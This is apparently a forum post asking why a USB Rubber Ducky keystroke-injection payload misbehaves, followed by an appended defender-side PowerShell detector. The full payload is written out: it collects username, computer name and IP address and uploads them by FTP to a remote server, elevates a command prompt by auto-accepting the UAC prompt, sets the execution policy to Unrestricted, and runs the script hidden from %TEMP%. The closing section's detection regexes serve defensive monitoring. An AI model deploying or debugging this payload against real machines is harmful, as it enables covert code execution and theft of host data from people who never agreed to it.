Wrote a Ducky Script to capture the computer name, username, IP address and current timestamp through a PowerShell script. It never works the way I want after encoding it and using the BIN file. The RUN window never opens, and neither does Notepad. It randomly opens some Excel file on the desktop and writes the STRING values there. The PowerShell commands at the end of the script seem to execute fine in the RUN window, but since the PS1 file is never created using Notepad, they are useless. I feel it might have something to do with the encoding; I've tried GB and US (my keyboard layout is US). I have verified that the PowerShell script works otherwise. For encoding, I have tried both the encoder on the DUCKTOOLKIT site and the local JAR encoder. I have also tried with all DELAYs above 1000. Need help figuring out what's going wrong.

NOTE: the username, password and server were replaced with correct values in the actual script. Successfully verified the PS script.

Ducky Script -

DELAY 500
GUI R
DELAY 500
STRING notepad
DELAY 500
ENTER
DELAY 1000
STRING $username = $env:username
ENTER
STRING $computername = $env:computername
ENTER
STRING $ipaddress = ([System.Net.DNS]::GetHostAddresses($env:computername) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | select-object IPAddressToString)[0].IPAddressToString
ENTER
STRING $timestamp = (get-date).ToString('d-M-y HH:mm:ss')
ENTER
STRING $File = "C:\Users\$username\$computername.txt"
ENTER
STRING "Computername: $computername" >> $File
ENTER
STRING "Username: $username" >> $File
ENTER
STRING "IP-Address: $ipaddress" >> $File
ENTER
STRING "Time: $timestamp" >> $File
ENTER
STRING "`n" >> $File
ENTER
STRING $ftp = "ftp://username:password@server/Ducky/$computername.txt"
ENTER
STRING $webclient = New-Object System.Net.WebClient
ENTER
STRING $uri = New-Object System.Uri($ftp)
ENTER
STRING $webclient.UploadFile($uri, $File)
ENTER
STRING $wshell = New-Object -ComObject Wscript.Shell
ENTER
STRING $wshell.Popup("Bazinga",0,"OOPS",0x1)
DELAY 3000
CTRL s
DELAY 1000
STRING %TEMP%\cache.ps1
TAB
DELAY 1000
DOWNARROW
DOWNARROW
DELAY 2000
ENTER
ALT s
DELAY 1000
ALT F4
DELAY 1000
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 500
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 500
STRING powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1
ENTER
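
Added defender-side example, not part of the original post and not code from Hak5 or the Ducky toolchain: whatever the keystroke-injection problem turns out to be, the three RUN-box commands at the end of this payload are typed verbatim into Windows and land unchanged in process-creation telemetry (Security event 4688 or Sysmon Event ID 1 command lines). The function below checks command lines for that chain: an execution-policy change to Unrestricted/Bypass, a hidden PowerShell window, a .ps1 launched out of %TEMP%, and an elevated cmd spawn via Start-Process -Verb runAs. The sample lines and the indicator names and regexes are this example's own constructions, not anything from the post.

```powershell
# Indicator table: each entry is a name of this example's choosing and a regex matched
# (case-insensitively, PowerShell's -match default) against one process command line.
$Indicators = @(
    @{ Name = 'ExecPolicyRelaxed'; Pattern = 'Set-ExecutionPolicy\s+''?(Unrestricted|Bypass)''?' }
    @{ Name = 'HiddenWindow';      Pattern = '-w(indowstyle)?\s+hidden' }
    @{ Name = 'ScriptFromTemp';    Pattern = '-File\s+(%TEMP%|.*\\AppData\\Local\\Temp)\\[^\s]+\.ps1' }
    @{ Name = 'ElevatedCmdSpawn';  Pattern = 'Start-Process\s+cmd.*-Verb\s+runAs' }
)

# Returns one object per command line that matched at least one indicator,
# with the matched indicator names joined by commas. Lines with no hit are dropped.
function Get-PayloadIndicators {
    param([Parameter(Mandatory)][string[]]$CommandLine)
    foreach ($line in $CommandLine) {
        $hits = @()
        foreach ($ind in $Indicators) {
            if ($line -match $ind.Pattern) { $hits += $ind.Name }
        }
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ CommandLine = $line; Indicators = ($hits -join ',') }
        }
    }
}

# Constructed sample telemetry: the three RUN-box commands from the post plus two benign lines
# that should not be flagged (a plain -NoProfile PowerShell call and a Notepad launch).
$Sample = @(
    'powershell Start-Process cmd -Verb runAs',
    'powershell Set-ExecutionPolicy ''Unrestricted'' -Scope CurrentUser -Confirm:$false',
    'powershell.exe -windowstyle hidden -File %TEMP%\cache.ps1',
    'powershell.exe -NoProfile -Command Get-Process',
    'notepad.exe C:\Users\alice\notes.txt'
)

Get-PayloadIndicators -CommandLine $Sample | Format-Table -AutoSize
```

Any one of these markers on its own has benign explanations (administrators relax execution policy, installers run hidden scripts), so the useful alert is the combination: two or more indicators from the same host within a short window, especially when the parent of the PowerShell process is explorer.exe, which is what a keystroke-driven RUN box produces rather than a scheduled task or a management agent.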
